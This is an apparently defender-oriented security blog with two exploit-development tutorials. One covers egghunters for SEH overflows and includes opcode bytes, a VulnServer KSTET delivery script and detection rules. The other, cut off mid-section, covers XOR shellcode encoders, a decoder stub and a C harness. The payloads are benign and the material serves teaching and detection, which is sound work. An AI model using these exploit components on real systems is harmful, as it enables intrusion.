Egghunters: Staged Payload Delivery When Buffer Space Is Tight
You’ve overwritten the SEH chain. The POP POP RET gadget drops you into a clean four-byte landing zone, the short jump carries you forward — and you count maybe 60 usable bytes before the buffer turns to garbage. Your stager is 350. That gap, between the space you control and the space your payload needs, is the entire reason egghunters exist.
An egghunter is a tiny piece of shellcode — roughly 32 bytes in its tightest form — whose only job is to walk the process’s virtual address space looking for a marker, then hand execution to whatever sits immediately after that marker. The real payload gets parked somewhere else in memory: a different request field, an HTTP header, the heap. Two stages, loosely coupled. The hunter is small enough to fit in the cramped overflow; the payload can be as large as you like, as long as it’s already resident when the hunter runs.
I’ll walk the mechanism, the two classic Windows implementations, the WoW64 wrinkle on modern Windows, and — because this is a defender’s site first — exactly how the technique lights up your telemetry.
1. Why Egghunters Exist
The technique traces back to Matt Miller (skape) and his survey of “safely searching process virtual address space.” The core insight: you can’t just dereference arbitrary addresses looking for your tag, because most of the address range is unmapped. Touch an unmapped page and you take an access violation, which by default kills the process. So the hunter needs a way to test a page for readability before it reads it.
The layout in memory looks like this:
    small overflow buffer (~32-60B)           elsewhere in the process
    +---------------------------+             +-----------------------------+
    | EGGHUNTER (the "hunter")  |  --scan->   | w00tw00t + full shellcode   |
    +---------------------------+             +-----------------------------+
          finds the doubled tag, jmp to payload

Two preconditions, both non-negotiable:
- At least ~32 reachable bytes to hold the hunter itself.
- The full payload must already be in memory when the hunter executes.
That second one bites people. If the payload isn’t resident yet, the hunter scans forever and pegs one CPU core at 100%. The first time I ran a KSTET egghunter I watched the target lock a core and assumed my opcode bytes were wrong. They weren’t — I’d sent the egg-tagged payload after the trigger instead of before, so there was nothing in memory to find. The hunter was working perfectly. It just had nothing to land on.
2. The Page-Walk Problem
x86 virtual memory is paged in 4 KB (0x1000) chunks. A page is either mapped (readable, possibly more) or unmapped (touching it faults). The egghunter exploits this granularity to scan efficiently and safely.
The trick is OR DX, 0x0FFF. That instruction forces the low 12 bits of the iterator register to all-ones, snapping EDX to the last byte of the current page. A following INC EDX rolls it over to the first byte of the next page. So when a page turns out to be invalid, the hunter doesn’t crawl byte-by-byte through 4096 bad addresses; it jumps straight to the next page boundary and probes again. Inside a valid page it advances one byte at a time, comparing the four bytes at each address against the tag.
A brief table of the moving parts:
| Component | Detail |
|---|---|
| Memory iterator register | EDX holds the current scan address |
| Page-boundary jump | OR DX, 0x0FFF → end of page; INC EDX → start of next page |
| Validity probe | A syscall (or an SEH frame) tests whether the page is readable |
| Egg comparison | SCASD compares EAX to [EDI], then advances EDI by 4 (direction flag clear) |
| Transfer to payload | JMP EDI once both halves of the egg match |
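The page-boundary arithmetic is easy to check outside a debugger. The sketch below models the two instructions on a 32-bit value; the function names are illustrative and not part of any tool.

```python
PAGE_MASK = 0x0FFF          # low 12 bits select the offset inside a 4 KB page
ADDR_MASK = 0xFFFFFFFF      # EDX is a 32-bit register


def or_dx_0fff(edx: int) -> int:
    """Model OR DX, 0x0FFF: set the low 12 bits, leave the rest untouched."""
    return edx | PAGE_MASK


def inc_edx(edx: int) -> int:
    """Model INC EDX with 32-bit wraparound."""
    return (edx + 1) & ADDR_MASK


def next_page_start(edx: int) -> int:
    """Address the hunter probes next after rejecting the page holding edx."""
    return inc_edx(or_dx_0fff(edx))


if __name__ == "__main__":
    for addr in (0x00401234, 0x00401FFF, 0xFFFFF123):
        print(f"{addr:#010x} -> {next_page_start(addr):#010x}")
```

The last sample address sits in the top page of the 32-bit range, so the increment wraps to zero and the scan starts over from the bottom of the address space.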

3. Anatomy of the Syscall Egghunter
The canonical 32-byte hunter uses the kernel as a page-validity oracle. It invokes NtAccessCheckAndAuditAlarm via the legacy INT 0x2E syscall gate and inspects the return: STATUS_ACCESS_VIOLATION (0xC0000005) means the page is bad, so skip it.
; --- 32-byte syscall egghunter (skape), egg = "w00t" ---
loop_inc_page:
or dx, 0x0fff ; EDX -> last byte of current 4KB page
loop_inc_one:
inc edx ; advance one byte (rolls into next page)
loop_check:
push edx ; save scan pointer (clobbered by syscall)
push 0x2 ; NtAccessCheckAndAuditAlarm syscall # (x86, XP-7)
pop eax ; -> EAX = 0x2 *** verify per OS, see j00ru ***
int 0x2e ; legacy syscall gate
cmp al, 0x05 ; low byte of STATUS_ACCESS_VIOLATION (0xC0000005)?
pop edx ; restore scan pointer
je loop_inc_page ; bad page -> skip to next page boundary
is_egg:
mov eax, 0x74303077 ; "w00t"
mov edi, edx ; EDI = current address
scasd ; compare [EDI] to EAX, EDI += 4
jnz loop_inc_one ; first half mismatch -> keep scanning
scasd ; compare the *second* half of the egg
jnz loop_inc_one
matched:
jmp edi ; EDI now points just past the doubled tag

The two back-to-back SCASD instructions are doing something specific: the tag is the 4-byte value repeated twice (eight bytes total). Requiring both halves to match makes a false positive vanishingly unlikely, and it keeps the hunter from matching the single copy of the tag embedded in its own MOV EAX instruction. Because SCASD advances EDI by four on each compare, after the second success EDI already points at the byte after the egg, exactly where the payload begins. Skape’s IsBadReadPtr-based variant runs 37 bytes; an NtDisplayString variant is also 32 bytes and works identically, with only the syscall number differing.
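To see why the doubled tag matters, it can help to run the same comparison logic over an ordinary byte string. This is a Python model of the scan, not shellcode; `find_payload_offset` and the sample buffer are made up for illustration.

```python
from typing import Optional

TAG = b"w00t"


def find_payload_offset(memory: bytes, tag: bytes = TAG) -> Optional[int]:
    """Return the offset just past the first doubled tag, or None.

    Mirrors the hunter's logic: step one byte at a time, compare four bytes
    (first SCASD), then the next four (second SCASD). After a double match
    the pointer has advanced eight bytes, which is where the payload starts.
    """
    width = len(tag)
    for addr in range(len(memory) - 2 * width + 1):
        edi = addr
        if memory[edi:edi + width] != tag:      # first SCASD mismatch
            continue
        edi += width
        if memory[edi:edi + width] != tag:      # second SCASD mismatch
            continue
        edi += width
        return edi                              # the JMP EDI target
    return None


if __name__ == "__main__":
    # A stray single tag, then the real doubled egg followed by one payload byte.
    mem = b"\x00" * 5 + b"w00t" + b"junk" + b"w00tw00t" + b"\xcc"
    print(find_payload_offset(mem))
```

The single `w00t` near the start of the sample buffer is skipped because the second comparison fails, which is the same reason the hunter does not jump into its own immediate operand.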
| Identifier | Value / Note |
|---|---|
| Syscall | NtAccessCheckAndAuditAlarm |
| Syscall number (x86 XP–7) | 0x02 |
| Invocation | INT 0x2E |
| Access-violation status | 0xC0000005 → CMP AL, 0x05 |
| Invalid-page action | JE loop_inc_page |
| Size | ~32 bytes |
Syscall numbers are OS-version specific. 0x02 is stable on XP/Vista/7; Windows 10 moved the table and changed the argument layout. Always confirm against Mateusz “j00ru” Jurczyk’s table at j00ru.vexillium.org/syscalls/nt/64/ for your exact target build.
4. The SEH-Based Variant
Rather than ask the kernel whether a page is valid, this approach installs a temporary Structured Exception Handler, reads memory blindly, and lets faults route into the handler — which simply advances the pointer and resumes. It runs around 60 bytes, but it carries no hardcoded syscall number, so it survives OS version drift better than the syscall hunter.
; --- SEH-based egghunter (illustrative, ~60 bytes) ---
; Register a handler so a read fault resumes scanning instead of crashing.
push handler ; EXCEPTION_REGISTRATION_RECORD.Handler
push dword [fs:0] ; .Next = current head of the SEH chain
mov [fs:0], esp ; install our frame as the new chain head
xor edx, edx ; scan pointer
scan_loop:
inc edx
mov edi, edx
mov eax, 0x74303077 ; "w00t"
scasd ; read [EDI]; faults route into 'handler'
jnz scan_loop
scasd ; confirm second half of the egg
jnz scan_loop
pop dword [fs:0] ; restore previous SEH frame
add esp, 4
jmp edi ; transfer to payload
handler: ; entered on STATUS_ACCESS_VIOLATION
; bump saved EDX in the CONTEXT past the bad page,
; return ExceptionContinueExecution, resume scan_loop
ret

| Feature | Syscall variant | SEH variant |
|---|---|---|
| Size | ~32 bytes | ~60 bytes |
| Validity check | INT 0x2E → NtAccessCheckAndAuditAlarm | Custom FS:[0] handler |
| OS portability | Fragile (syscall # changes) | More portable |
| Detection surface | INT 0x2E is glaring | Quieter, but installs an SEH frame |
That detection-surface row matters from both chairs. The SEH hunter gets recommended as the “portable” choice, and it is — but the syscall hunter’s INT 0x2E is so unused by legitimate user-mode code that flagging it is nearly a free win for the blue team.
![Hierarchy diagram comparing the two classic egghunter variants: the 32-byte syscall hunter using INT 0x2E with OS-specific syscall numbers versus the 60-byte SEH hunter using a custom FS:[0] fault handler with better portability.](https://genxcyber.com/wp-content/uploads/2026/06/egghunter-staged-payload-delivery-tight-buffer-2.png)
5. Egg Tags and Bad Characters
The tag is a 4-byte value written twice. Common choices: w00tw00t (0x74303077), T00WT00W, b33fb33f, c0d3c0d3, ERCDERCD. Two independent constraints govern selection.
First, every byte of the hunter and the tag must avoid the vulnerable function’s bad characters — \x00, \x0A, \x0D are the usual suspects for string-based bugs, but the set is target-specific. Profile it before you commit to a tag.
Second, and easy to forget: the egg must be unique in process memory ahead of the payload. If the doubled 8-byte egg appears anywhere before your real payload (a stale copy from an earlier request, or elsewhere in your own crafted buffer), the hunter jumps there first and executes garbage. A single stray copy of the 4-byte tag won’t pass the second SCASD, but it is cheap to rule out as well. Scan your buffer before sending:

    def egg_is_unique(buffer: bytes, tag: bytes) -> bool:
        payload_at = buffer.find(tag * 2)   # the real, doubled egg
        if payload_at == -1:
            print(f"[!] doubled tag {tag * 2!r} not found in buffer")
            return False
        earlier = buffer.find(tag)          # first single hit anywhere
        if earlier < payload_at:
            print(f"[!] tag {tag!r} appears at offset {earlier} "
                  f"before the payload at {payload_at}")
            return False
        return True

The bad-character hunt itself is methodology, not a payload: send a known byte sequence, then diff the receiving buffer in the debugger against what you sent.

    # Bad-character probe: compare against the in-memory dump in x64dbg/Immunity
    allchars = bytes(range(1, 256))         # skip \x00 explicitly, test the rest
    probe = b"A" * 66 + b"B" * 4 + allchars
    # Any byte that is mangled, truncated, or terminates the string is "bad".

6. WoW64 and Windows 10
Run a 32-bit egghunter on 64-bit Windows 10 and the old PoCs frequently misfire — the syscall table and ABI underneath WoW64 aren’t what the XP-era hunter expects. The working approach (Corelan published a tested version) uses Heaven’s Gate: transitioning a WoW64 thread from 32-bit to 64-bit mode to issue the real syscall.
The CS segment selector reveals the mode: 0x23 for 32-bit, 0x33 for 64-bit. The hunter checks it, then calls through the pointer stored at FS:[0xC0], the WoW64 transition stub that switches the thread into 64-bit code.

    ; --- WoW64 / Heaven's Gate egghunter (conceptual fragment) ---
    mov ebx, cs             ; read code-segment selector
    cmp bl, 0x23            ; 0x23 = 32-bit (WoW64) execution?
    ; ... stage 64-bit syscall args ...
    mov bl, 0xc0
    call dword [fs:ebx]     ; indirect call via FS:[0xC0] -> WoW64 transition to 64-bit mode
    cmp al, 0x05            ; STATUS_ACCESS_VIOLATION low byte
    je loop_inc_page

The Exploit-DB WoW64 sample (45293) pushes 0x29 as the NtAccessCheckAndAuditAlarm number on a particular Windows 10 x64 build. Don’t copy that number blindly. Verify it against j00ru’s table for your build, because it’s exactly the field that breaks between releases.
7. Wiring It Into an SEH Overflow
A typical delivery rides a standard SEH overwrite: nSEH gets a short jump forward, SEH gets a POP/POP/RET gadget that returns into nSEH, the short jump skips over the SEH record, and the hunter runs from there.
    [ PADDING ][ nSEH: \xEB\x06\x90\x90 ][ SEH: pop/pop/ret addr ][ egghunter ]
    ... and the egg-tagged full payload lives in a SEPARATE field/request ...

A lab skeleton for that layout:

    #!/usr/bin/env python3
    # LAB ONLY: staged egghunter delivery skeleton (offsets/gadget are placeholders)
    import socket

    RHOST, RPORT = "192.168.56.20", 9999

    egghunter = (  # 32-byte syscall hunter, tag "w00t"
        b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
        b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
    )
    nseh = b"\xeb\x06\x90\x90"   # jmp +6 over the SEH record
    seh = b"\x42\x42\x42\x42"    # PLACEHOLDER pop/pop/ret (find per target)
    egg = b"w00tw00t"            # tag, doubled
    payload = egg + b"\x90" * 16 + b"\xcc"   # \xcc = test int3; swap for calc.exe popup in lab

    trigger = b"A" * 66 + nseh + seh + egghunter
    trigger += b"C" * (1000 - len(trigger))

    with socket.create_connection((RHOST, RPORT)) as s:
        s.recv(1024)                                # read the banner
        s.sendall(b"KSTET " + payload + b"\r\n")    # 1) stage the egg-tagged payload first
        s.sendall(b"KSTET " + trigger + b"\r\n")    # 2) THEN trigger overflow + run hunter

Order matters — payload first, trigger second. Reverse it and you get the 100% CPU loop from section 1.
8. Lab: VulnServer KSTET
VulnServer’s KSTET command is the standard teaching target: its overflow leaves a constrained buffer that naturally forces a staged approach. The workflow:
- Attach VulnServer in Immunity Debugger or x64dbg.
- Fuzz KSTET, find the offset to SEH control with a cyclic pattern.
- Locate a clean POP/POP/RET in a non-/SAFESEH, non-ASLR module.
- Generate the hunter with mona: !mona egg -t w00t (mona’s -cpb option takes the bad-character list; -c enables the checksum routine, so check !mona help egg for your version). Mona can emit both SEH-based and NtAccessCheckAndAuditAlarm-based hunters.
- Set a breakpoint on the SCASD (\xAF) opcode and single-step to watch EDI march toward the egg; this is the moment that makes the mechanism click.
Read the manual assembly alongside mona’s output. Treat mona as a generator, not a black box. Use a calc.exe/cmd.exe popup as the test payload — never real C2.
9. Detecting Egghunter Behavior
The hunter is loud if you’re listening. Two behavioral tells lead:
- A single thread pegged at 100%, particularly right after a crash-and-recover on a network service — the symptom of a hunter scanning with no resident payload.
- NtAccessCheckAndAuditAlarm fired thousands of times in rapid succession, which no legitimate user-mode workload does. It surfaces in ETW syscall traces.
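The second tell lends itself to a simple sliding-window count. The sketch below assumes a simplified, hypothetical record format of `(timestamp, thread_id, syscall_name)`; real ETW output has a different schema, and the window and threshold defaults are placeholders to tune against your own baseline.

```python
from collections import defaultdict
from typing import Iterable, List, Tuple

# Hypothetical trace record: (timestamp_seconds, thread_id, syscall_name).
Event = Tuple[float, int, str]


def bursty_threads(events: Iterable[Event],
                   syscall: str = "NtAccessCheckAndAuditAlarm",
                   window: float = 1.0,
                   threshold: int = 1000) -> List[int]:
    """Return thread IDs that issued `syscall` at least `threshold` times
    within any span of `window` seconds."""
    per_thread = defaultdict(list)
    for ts, tid, name in events:
        if name == syscall:
            per_thread[tid].append(ts)

    flagged = []
    for tid, stamps in per_thread.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # shrink the window from the left
                start += 1
            if end - start + 1 >= threshold:
                flagged.append(tid)
                break
    return sorted(flagged)
```

Counting per thread rather than per process keeps the rule aligned with the first tell: the hunter runs on the single hijacked thread, so the burst and the pegged core should point at the same thread ID.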
| Event ID | Name | Relevance |
|---|---|---|
| 1 | Process Creation | Baseline parent-child chain for the vulnerable service |
| 8 | CreateRemoteThread | Egg payload injecting; StartModule/StartFunction empty when the start address is outside loaded modules, a shellcode tell |
| 10 | ProcessAccess | Cross-process handles requesting PROCESS_VM_WRITE (0x0020), PROCESS_VM_OPERATION (0x0008), PROCESS_CREATE_THREAD (0x0002) |
| 25 | ProcessTampering | Sysmon 13+; in-memory image diverging from disk, a hallmark of in-memory execution |
Default SwiftOnSecurity Sysmon config won’t catch CreateRemoteThread injection out of the box because of kernel32.dll exclusions — tune it before you rely on Event ID 8.
    title: Remote Thread Start Address Outside Loaded Modules
    id: 5a9d3e21-egg0-4c11-9f0a-shellcodeloader   # placeholder; replace with a real UUID
    status: experimental
    logsource:
        product: windows
        category: create_remote_thread   # Sysmon Event ID 8
    detection:
        selection:
            StartModule: ''
            StartFunction: ''
        condition: selection
    level: high

Pair that with Microsoft-Windows-Threat-Intelligence ETW (fires on WriteProcessMemory/CreateRemoteThread, needs PPL to consume) and audit policy: auditpol /set /subcategory:"Process Creation" /success:enable yields Security Event 4688; command lines appear in it only once the “Include command line in process creation events” policy is also enabled. And flag INT 0x2E in user mode wherever EDR or ETW lets you; it’s about as high-fidelity as indicators get.
YARA pins the syscall hunter’s opcode signature for memory forensics:
    rule Egghunter_Syscall_x86 {
        meta:
            description = "skape NtAccessCheckAndAuditAlarm egghunter (~32 bytes)"
            author = "GenXCyber"
        strings:
            $page_walk = { 66 81 CA FF 0F }       // or dx, 0x0fff
            $syscall   = { CD 2E 3C 05 }          // int 0x2e ; cmp al, 0x05
            $scasd     = { AF 75 ?? AF 75 ?? }    // scasd/jnz twice (doubled egg check)
        condition:
            all of them and
            @syscall > @page_walk and (@syscall - @page_walk) < 32
    }

10. Tools for Egghunter Analysis
| Tool | Description | Link |
|---|---|---|
| mona.py | Generates/verifies egghunters (!mona egg) in Immunity | corelan.be |
| Immunity Debugger | Classic exploit-dev debugger, mona host | immunityinc.com |
| x64dbg | Free user-mode debugger for stepping the scan | x64dbg.com |
| VulnServer | Safe, intentionally vulnerable practice target | github.com |
| Process Hacker | Spot the 100% CPU thread and handle access | processhacker.sourceforge.io |
| Sysmon | EID 8/10/25 telemetry for shellcode behavior | microsoft.com |
| j00ru syscall table | Authoritative per-OS syscall numbers | j00ru.vexillium.org |
| osed-scripts (epi052) | Egghunter generator and OSED helpers | github.com |
11. Mitigations and Modern Reality
Egghunters were a 32-bit-era staple, and modern defenses have narrowed their utility considerably.
| Mitigation | Effect on the technique |
|---|---|
| DEP / NX | Payload on stack/heap won’t execute; primary kill switch for legacy targets |
| ASLR | Hardcoded POP/POP/RET addresses break; forces wider scans → more CPU and ETW noise |
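| Control Flow Guard | Validates indirect call targets in CFG-instrumented code; can block the initial control-flow hijack, but does not police the hunter’s own JMP EDI once shellcode is running |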
| GS / stack canaries | Don’t stop the hunter, but can stop the overflow that delivers it |
| App sandboxing | Limits post-execution blast radius |
The technique still earns its place in OSED-style coursework and against unhardened legacy 32-bit software — which is exactly where you find it in real engagements.
12. MITRE ATT&CK Mapping
Egghunters are delivery scaffolding, not a post-exploitation tactic. There’s no ATT&CK sub-technique for “egghunter,” and you shouldn’t invent one. It sits upstream of the payload, in the exploitation-and-loading layer. Map the surrounding behavior:
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploitation for Client Execution | T1203 | Service crash/recover, EID 1 anomalies |
| Process Injection | T1055 | Sysmon EID 8/10, TI ETW |
| Process Injection: DLL Injection | T1055.001 | EID 8 with empty StartModule |
| Reflective Code Loading | T1620 | In-memory PE, EID 25 ProcessTampering |
| Obfuscated Files or Information | T1027 | Encoded egg payload, YARA on decoder stubs |
| Sandbox Evasion: Time Based | T1497.003 | CPU-spike artifact in sandboxes |
Summary
- An egghunter is a ~32-byte stage-1 stub that scans process memory for a doubled tag and jumps to the stage-2 payload — the answer to “my buffer is too small for real shellcode.”
- The hunter walks memory page-by-page (OR DX, 0x0FFF), validates each page via NtAccessCheckAndAuditAlarm / INT 0x2E (or an SEH frame), and confirms the egg with two consecutive SCASD instructions before JMP EDI.
- The payload must already be resident when the hunter runs; otherwise it loops and pegs a CPU core, a behavioral indicator in its own right.
- Syscall numbers are OS-version specific (verify against j00ru) and WoW64 needs Heaven’s Gate, so portability is the real-world friction.
- Detect it via the INT 0x2E anomaly, rapid NtAccessCheckAndAuditAlarm bursts, Sysmon EID 8 threads with empty StartModule, EID 25 tampering, and a YARA signature on the canonical opcode window, and mitigate upstream with DEP, ASLR, and CFG.
References
- The Basics of Exploit Development 3: Egg Hunters – Coalfire Blog
- Windows User Mode Exploit Development: Egghunter Part 3 – memN0ps
- Windows Exploit Development: Egg Hunting – Shellcode.Blog
- Metasploit Framework – Msf::Exploit::Remote::Egghunter Mixin (Source)
- OSED Scripts: Egghunter Generator (NtAccessCheckAndAuditAlarm & SEH variants) – epi052/osed-scripts
Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
You found the overflow. You control EIP. Your execve("/bin/sh") payload runs perfectly in the debugger — and then dies the moment it crosses the wire. Nine times out of ten the culprit is a single byte the transport or a string routine refused to carry intact. A \x00 that strcpy treated as end-of-string. A \x0a the protocol parser read as newline. The fix isn’t a better payload; it’s an encoder that launders the offending bytes out, plus a tiny decoder that rebuilds the original at runtime.
This walks through XOR encoding end to end — the byte math, a Python encoder, a position-independent decoder stub in x86 NASM, a per-chunk keyed variant, stack-based decoding, and what shikata_ga_nai adds on top. Every stub here decodes a benign exit(0) payload. The point is to understand the mechanism well enough to detect and defend against it, so the final third is all blue team.
1. Why Shellcode Breaks: Bad Characters
A bad character is any byte value the delivery path mangles, truncates, or drops before your shellcode lands in executable memory intact. The constraint comes from the vulnerability, not from the payload.
| Byte | Name | Why it breaks things |
|---|---|---|
| \x00 | NULL | Terminates C strings; strcpy/sprintf stop copying here |
| \x0a | Line Feed | Read as end-of-input by line-oriented protocols and gets |
| \x0d | Carriage Return | Paired with \x0a in HTTP/SMTP headers; often stripped |
| \x20 | Space | Token delimiter in many parsers |
| \xff | 0xFF | Sentinel / length markers in some binary protocols |
The list is per target. A web exploit might tolerate \x00 (the buffer isn’t a C string) but choke on \x26 (&) because of URL parsing. You don’t guess — you measure (Section 3).
2. The XOR Contract
XOR is the canonical encoding operation for one reason: it’s its own inverse. XOR a byte with a key, XOR the result with the same key, and you’re back where you started.
A ⊕ K ⊕ K = A

| A | K | A ⊕ K |
|---|---|---|
| 0 | 0 | 0 |
| 0 | 1 | 1 |
| 1 | 0 | 1 |
| 1 | 1 | 0 |
There’s no key schedule, no S-box, no state to carry, which matters because every byte of decoder stub is a byte that isn’t shellcode. A single-byte XOR decoder fits in about 20 bytes. That economy is exactly why it shows up in real tooling and why analysts learn to recognize its shape on sight.
The encoder’s job is to pick a key K such that original_byte ⊕ K is never a bad character, for every byte in the payload. If a candidate key produces even one collision, throw it away and try the next. Note that a byte equal to the key encodes to \x00 (B ⊕ B = 0), so when \x00 is bad, any key that also appears in the payload is out.
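Both properties, the self-inverse round trip and the key-equals-byte collision, can be checked in a few lines. This is a minimal sketch; the helper names and sample bytes are arbitrary.

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def keys_producing_null(data: bytes) -> set:
    """Keys that encode at least one byte to 0x00 (b ^ k == 0 only when k == b)."""
    return set(data)


if __name__ == "__main__":
    sample = bytes([0x31, 0xC0, 0xB0, 0x01])      # arbitrary demo bytes
    key = 0xAA
    encoded = xor_bytes(sample, key)
    assert xor_bytes(encoded, key) == sample      # the same operation decodes
    print(encoded.hex(), sorted(hex(k) for k in keys_producing_null(sample)))
```

Because the set of null-producing keys is just the set of distinct payload bytes, a payload that uses most byte values leaves few or no usable single-byte keys.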

3. Finding the Bad Chars
Before you encode anything, you enumerate what to avoid. The workflow is mechanical:
1. Build a test pattern of all 256 byte values, \x00 through \xff, minus any you already know are bad.
2. Drop it into the vulnerable buffer and dump the buffer from memory.
3. Diff the dump against what you sent. The first byte that’s wrong (mangled, missing, or where the copy stopped) is a bad char.
4. Add it to the list, regenerate the pattern without it, repeat until the whole pattern survives byte-for-byte.
A small diff helper makes step 3 fast:
    #!/usr/bin/env python3
    # Bad-char scanner: compare what you sent vs. what landed in memory.
    def first_bad(expected: bytes, received: bytes):
        for i, (e, r) in enumerate(zip(expected, received)):
            if e != r:
                return i, hex(e), hex(r)    # index, sent, received
        if len(expected) != len(received):
            return min(len(expected), len(received)), "(truncated)", None
        return None

    # expected = bytes(range(0x01, 0x100))    # full pattern minus \x00
    # received = open("dump.bin", "rb").read()
    # print(first_bad(expected, received))

Truncation tells you something extra: the first byte that failed to arrive (expected[i] at the returned index) is usually the terminator. Note it, exclude it, run again.
4. Building an XOR Encoder in Python
The encoder ingests raw shellcode and the confirmed bad-char set, searches for a clean single-byte key, and emits the encoded blob.
    #!/usr/bin/env python3
    # XOR shellcode encoder: teaching / authorized-lab use only.
    # Benign x86 stub: exit(0) (xor eax,eax; mov al,1; xor ebx,ebx; int 0x80)
    shellcode = bytes([0x31, 0xc0, 0xb0, 0x01, 0x31, 0xdb, 0xcd, 0x80])
    bad_chars = {0x00, 0x0a, 0x0d}

    def find_key(sc, bad):
        for key in range(1, 256):
            if key in bad:
                continue
            if all((b ^ key) not in bad for b in sc):   # no encoded byte is bad
                return key
        return None

    key = find_key(shellcode, bad_chars)
    if key is None:
        raise SystemExit("[-] No single-byte key is clean. Use per-chunk keying.")

    encoded = bytes(b ^ key for b in shellcode)
    print(f"[+] key = {hex(key)}")
    print(f"[+] length = {len(encoded)}")
    print("[+] blob = " + "".join(f"\\x{b:02x}" for b in encoded))

If find_key returns None, no single byte can XOR the whole payload clean: you’ve over-constrained the key space. That’s the cue to move to a per-chunk scheme (Section 7), where each chunk gets its own key.
5. The Decoder Stub in x86 (NASM)
The stub runs first on the target, decodes the bytes that follow it, and jumps into them. The hard part is position independence: the stub doesn’t know its own load address, so it can’t hardcode a pointer to the encoded blob. The classic answer is JMP-CALL-POP — a forward jmp short to a call that points backward, so the call pushes the address of the bytes immediately after it. pop that return address and you’ve located your payload at runtime.
section .text
global _start
_start:
jmp short get_payload ; (1) hop over the decoder to the CALL
decoder:
pop esi ; (3) ESI -> first encoded byte
xor ecx, ecx
mov cl, payload_len ; loop counter = payload length
decode_loop:
xor byte [esi], 0xAA ; (4) decode one byte, key = 0xAA
inc esi ; advance
loop decode_loop ; ECX--, repeat while non-zero
jmp payload ; (5) run the now-decoded shellcode
get_payload:
call decoder ; (2) pushes addr of `payload`, jumps back
payload:
db 0xcc, 0xcc, 0xcc ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.
Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len keeps only the low eight bits of anything over 255 (NASM typically warns rather than failing), so a 300-byte payload decodes only its first 44 bytes (300 mod 256) and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, keep the xor ecx, ecx and load the count with mov cx, payload_len. A full mov ecx, payload_len also works, but its 32-bit immediate carries \x00 bytes for any realistic length, so audit the result against your bad-char list.
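The truncation is plain modular arithmetic, and a few lines make the failure mode concrete. The helper below is an illustrative model of the counter setup in the stub above, not part of any toolchain.

```python
def effective_loop_count(payload_len: int) -> int:
    """Iterations the decode loop runs when the counter is loaded with
    `xor ecx, ecx` followed by `mov cl, payload_len`."""
    cl = payload_len & 0xFF            # only the low 8 bits reach CL
    # LOOP decrements ECX first, then branches while ECX != 0, so a starting
    # value of 0 wraps to 0xFFFFFFFF and the loop runs 2**32 times.
    return cl if cl != 0 else 2 ** 32


if __name__ == "__main__":
    for n in (8, 255, 256, 300):
        print(n, "->", effective_loop_count(n))
```

The exact-multiple case is arguably worse than the 300-byte one: a 256-byte payload leaves CL at zero, and the loop then runs off the end of the buffer until it faults.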
Build and extract:
nasm -f elf32 stub.asm -o stub.o
ld -m elf_i386 stub.o -o stub
objdump -d stub # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM, never on your host and never networked:
/* LAB ONLY — disposable VM, no network.
gcc -m32 -z execstack -fno-stack-protector test.c -o test */
#include <stdio.h>
unsigned char buf[] =
"\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
"\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
printf("stub length: %zu\n", sizeof(buf) - 1);
((void(*)())buf)();
return 0;
}
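Before running anything, the branch displacements in those 20 stub bytes can be checked by hand or with a short script. The sketch below decodes the rel8 and rel32 operands and prints where each branch lands; the helper names are illustrative, and the offsets assume the stub starts at address 0.

```python
import struct

# The 20 decoder-stub bytes from the C harness above (payload not included).
STUB = bytes.fromhex("eb0d5e31c9b1088036aa46e2faeb05e8eeffffff")


def rel8_target(code: bytes, offset: int) -> int:
    """Target of a 2-byte rel8 branch (JMP SHORT 0xEB, LOOP 0xE2) at offset."""
    disp = struct.unpack_from("b", code, offset + 1)[0]
    return offset + 2 + disp


def rel32_target(code: bytes, offset: int) -> int:
    """Target of a 5-byte CALL rel32 (0xE8) at offset."""
    disp = struct.unpack_from("<i", code, offset + 1)[0]
    return offset + 5 + disp


if __name__ == "__main__":
    print("jmp short get_payload ->", rel8_target(STUB, 0))
    print("call decoder          ->", rel32_target(STUB, 15))
    print("loop decode_loop      ->", rel8_target(STUB, 11))
    print("jmp payload           ->", rel8_target(STUB, 13))
    print("return address pushed by call:", 15 + 5)
```

The value the CALL pushes and the target of the final jump are the same offset, the first byte after the stub, which is the whole point of JMP-CALL-POP: the return address is the payload address.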
6. The Stub Must Be Clean Too
This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.
So audit the stub bytes the same way you audit everything else:
    #!/usr/bin/env python3
    # Flag any decoder-stub byte that collides with the bad-char set.
    from capstone import Cs, CS_ARCH_X86, CS_MODE_32

    def audit_stub(stub: bytes, bad: set):
        md = Cs(CS_ARCH_X86, CS_MODE_32)
        for ins in md.disasm(stub, 0x0):
            raw = stub[ins.address:ins.address + ins.size]
            hits = [hex(b) for b in raw if b in bad]
            tag = f" <-- BAD {hits}" if hits else ""
            print(f"{ins.address:04x} {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax → \x29\xc0, which zeroes the register just as well. Same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.
7. Per-Chunk Keyed Encoding
When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.
